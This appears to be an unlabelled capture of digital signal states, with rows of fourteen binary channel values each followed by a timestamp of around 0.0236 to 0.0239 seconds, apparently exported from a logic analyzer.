1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3618448e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3618476e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3618500e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3618524e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3618548e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3618572e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3618596e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3618624e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3618648e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3618676e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3618700e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3618724e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3618752e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3618776e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3618804e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3618828e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,2.3743412e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.3743596e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.3743620e-02 0,0,1,0,0,0,0,0,0,0,0,1,0,1,2.3743652e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.3743676e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,2.3744016e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.3744040e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,2.3744064e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.3744088e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,2.3744116e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.3744140e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,2.3744188e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.3744212e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,1,2.3744220e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,1,2.3744236e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3744244e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3744264e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,2.3744268e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3744272e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3744288e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3744316e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3744340e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3744364e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3744368e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3744412e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3744440e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,2.3744444e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3744448e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3744464e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3744488e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3744540e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3744564e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3744612e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3744640e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3744692e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3744716e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3744740e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3744764e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3744788e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3744812e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3744820e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3744864e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3744892e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,2.3744896e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3744900e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3744916e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3744940e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3744964e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3744988e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3745012e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3745036e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3745064e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3745088e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3745116e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3745140e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3745164e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3745188e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3745212e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3745236e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3745264e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3745288e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3745316e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3745340e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3745388e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3745412e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3745420e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3745440e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3745464e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,2.3745468e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3745472e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3745488e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3745516e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3745540e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3745564e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3745588e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3745612e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3745636e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3745664e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3745688e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3745716e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3745740e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3745764e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3745788e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3745812e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3745836e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3745864e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3745888e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3745916e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3745940e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3745964e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3745968e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3746012e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3746040e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,2.3746044e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3746048e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3746064e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3746088e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3746116e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3746140e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3746164e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3746188e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3746196e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3746240e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3746264e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3746272e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3746292e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3746316e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3746340e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3746364e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3746412e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3746440e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3746444e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3746464e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3746488e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3746496e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3746516e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3746540e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3746544e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3746588e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3746612e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3746620e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3746640e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3746664e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3746688e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3746716e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3746740e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3746764e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3746812e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3746840e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3746892e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3746916e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3746964e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3746988e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3747040e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3747064e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3747092e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3747116e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3747140e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3747164e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3747188e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3747212e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3747236e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3747264e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3747288e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3747316e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3747340e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3747364e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3747388e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3747412e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3747436e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3747464e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3747488e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3747516e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3747564e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3747588e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3747596e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3747612e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3747636e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3747692e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3747716e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3747764e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3747788e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3747840e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3747864e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3747892e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3747916e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3747940e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3747964e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3747988e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3748012e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3748036e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3748064e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3748088e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3748116e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3748164e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3748188e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3748196e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3748212e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3748236e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3748264e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3748288e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3748316e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3748340e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3748364e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3748388e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3748412e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3748436e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3748464e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3748488e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3748492e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3748540e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3748564e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3748572e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3748588e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3748612e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3748636e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3748664e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3748688e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3748716e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3748764e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3748788e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3748812e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3748836e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3748892e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3748916e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3748964e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3748988e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3749040e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3749064e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3749092e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3749116e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3749140e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3749164e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3749168e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3749212e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3749240e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,2.3749244e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3749248e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3749264e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3749288e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3749316e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3749336e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3749364e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3749388e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3749436e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3749460e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3749484e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3749512e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3749536e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3749564e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3749588e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3749612e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3749636e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3749660e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3749684e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3749712e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3749764e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3749788e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3749792e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3749812e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3749836e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3749844e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3749860e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3749884e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3749912e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3749936e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3749988e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3750012e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3750036e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3750060e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3750112e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3750136e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3750188e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3750212e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3750260e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3750284e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3750312e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3750336e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3750364e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3750388e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3750412e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3750436e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3750460e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3750484e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3750512e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3750536e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3750564e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3750588e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3750612e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3750636e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3750660e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3750684e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3750712e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3750736e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3750764e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3750788e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3750812e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3750836e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3750860e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3750884e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3750912e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3750936e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3750964e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3750988e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3751012e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3751036e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3751060e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3751084e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3751112e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3751136e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3751164e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3751188e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.3875316e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,2.3875548e-02 1,0,1,0,0,0,0,0,0,0,0,1,0,1,2.3875576e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,2.3875600e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,1,2.3875896e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,2.3875924e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,1,2.3875948e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,2.3875972e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,1,2.3876020e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,2.3876048e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,1,2.3876052e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,1,2.3876100e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,1,2.3876124e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,2.3876132e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3876148e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3876172e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3876196e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3876220e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3876244e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3876272e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3876296e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3876300e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3876348e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3876372e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3876380e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3876420e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3876448e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3876452e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3876472e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3876496e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3876524e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3876548e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3876572e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3876596e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3876604e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3876648e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3876672e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3876696e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3876724e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3876772e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3876796e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3876804e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3876820e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3876844e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3876872e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3876896e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3876924e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3876948e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3876972e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3876996e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3877020e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3877044e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3877072e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3877096e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3877124e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3877148e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3877172e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3877196e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3877248e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3877272e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3877276e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3877324e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3877348e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3877356e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3877396e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3877420e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3877444e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3877472e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3877496e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3877524e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3877548e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3877572e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3877596e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3877620e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3877644e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3877672e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3877696e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3877724e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3877748e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3877772e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3877796e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3877820e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3877844e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3877872e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3877896e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3877924e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3877972e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3877996e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3878004e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3878020e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3878044e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3878072e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3878096e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3878124e-02 1,0,1,0,0,0,0,0,0,1,0,0,0,0,2.3878148e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3878152e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3878196e-02 